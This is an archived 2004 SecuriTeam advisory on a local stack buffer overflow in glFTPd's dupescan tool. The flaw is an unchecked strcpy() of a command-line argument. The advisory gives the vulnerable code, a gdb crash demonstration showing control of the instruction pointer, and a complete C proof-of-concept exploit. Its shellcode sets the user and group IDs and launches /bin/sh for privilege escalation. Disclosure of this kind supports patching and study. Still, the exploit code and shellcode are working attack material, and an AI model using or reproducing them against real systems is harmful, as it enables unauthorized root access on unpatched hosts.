[UNIX] glFTPd Local Stack Buffer Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 09/22/04

  • Next message: SecuriTeam: "[EXPL] Buffer Overrun in JPEG Processing (GDI+) Exploit"
    To: list@securiteam.com
    Date: 22 Sep 2004 18:37:49 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      glFTPd Local Stack Buffer Overflow
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.glftpd.com> glFTPd is a very advanced ftp server with lots of
    possibilities. One of the main differences between many other ftp servers
    and glFTPd is that it has its own user database which can be completely
    maintained online using ftp site commands. Using ftp site commands it is
    also possible to see stats, view logs, execute scripts and do many more
    things. glFTPd runs within a chroot environment which makes it relatively
    safe. The glFTPd team continuously works on improving this free piece of
    beautiful software.

    Due to an unsafe copying of parameters from the command line using
    strcpy() it is possible to overflow a local buffer and cause gIFTPd to
    crash.

    DETAILS

    Vulnerable Systems:
     * gIFTPd version 2.00 RC3 and prior

    The vulnerability exists because of an unsafe usage of the strcpy()
    function. Thus, a buffer overflow condition is possible which allows a
    local user to perform privilege escalation. The problematic code is:
    39: int main (int argc, char *argv[]) {
    40: FILE *fp;
    41: char dupename[255], dupefile[255], Temp[255];
    42: struct dupefile buffer;
    43: if (argc == 1){
    44: printf("USAGE: %s <filename>\n", argv[0]);
    45: return 0;
    46: }
    47:
    48: read_conf_datapath(Temp);
    49: sprintf(dupefile, "%s/logs/dupefile", Temp);
    50:
    51: strcpy(dupename, argv[1]); <----- THE BUG
    52: if((fp = fopen(dupefile, "r")) == NULL)
    53: return 0;
    54:

    In order to demonstrate the issue, perform the following:
    coki@nosystem:~$ /glftpd/bin/dupescan `perl -e 'print "A" x 300'`
    Done
    Segmentation fault
    coki@nosystem:~$

    coki@nosystem:~$ gdb /glftpd/bin/dupescan
    GNU gdb 6.1.1
    Copyright 2004 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you
    are
    welcome to change it and/or distribute copies of it under certain
    conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for details.
    This GDB was configured as "i486-slackware-linux"...Using host
    libthread_db library "/lib/libthread_db.so.1".

    (gdb) r `perl -e 'print "A" x 300'`
    Starting program: /glftpd/bin/dupescan `perl -e 'print "A" x 300'`
    Done

    Program received signal SIGSEGV, Segmentation fault.
    0x41414141 in ?? ()
    (gdb) quit
    The program is running. Exit anyway? (y or n) y
    coki@nosystem:~$

    Exploit
    /* glFTPd local stack buffer overflow exploit
       (Proof of Concept)

       Tested in Slackware 9.0 / 9.1 / 10.0

       by CoKi <coki@nosystem.com.ar>
       No System Group - http://www.nosystem.com.ar
    */

    #include <stdio.h>
    #include <strings.h>
    #include <unistd.h>

    #define BUFFER 288 + 1
    #define PATH "/glftpd/bin/dupescan"

    char shellcode[]=
            "\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x17\xcd\x80"
            "\x31\xdb\x31\xc0\xb0\x17\xcd\x80"
            "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07"
            "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
            "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

    int main(void) {

            char *env[3] = {shellcode, NULL};
            char buf[BUFFER], *path;
            int *buffer = (int *) (buf);
            int i;
            int ret = 0xbffffffa - strlen(shellcode) - strlen(PATH);

            for(i=0; i<=BUFFER; i+=4)
            *buffer++ = ret;

            printf("\n glFTPd local stack buffer overflow (Proof of
    Concept)\n");
            printf(" by CoKi <coki@nosystem.com.ar>\n\n");

            execle(PATH, "dupescan", buf, NULL, env);
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:coki@nosystem.com.ar> CoKi.
    The original article can be found at:
    <http://www.nosystem.com.ar/advisories/advisory-05.txt>
    http://www.nosystem.com.ar/advisories/advisory-05.txt

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[EXPL] Buffer Overrun in JPEG Processing (GDI+) Exploit"

    Relevant Pages

    • [EXPL] Citadel/UX Remote Buffer Overflow Exploit
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Citadel/UX Remote ... Listed below is a remote ... GNU gdb Red Hat Linux ...
      (Securiteam)
    • [UNIX] SoX Local Buffer Overflow Vulnerabilities (st_wavstartread)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... the program first reads 4 bytes from the .WAV file into a variable. ... GNU gdb 6.1-debian ... There is absolutely no warranty for GDB. ...
      (Securiteam)
    • [REVS] Format String Exploitation Demonstration (Linux)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... GNU gdb 6.5 ... Exit anyway? ... Our offset is 2. ...
      (Securiteam)
    • [NEWS] 0verkill Buffer Overflow Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... $HOME environment variable demonstrates the buffer overflow, ... GNU gdb 5.0 ... vulnerability or to otherwise crash the program. ...
      (Securiteam)
    • [UNIX] Qmail Crash and Memory Overwrite After Long SMTP Session
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Overflow of the 'pos' variable: ... gdb attach 1810 ... Reading symbols from /var/qmail/bin/qmail-smtpd...done. ...
      (Securiteam)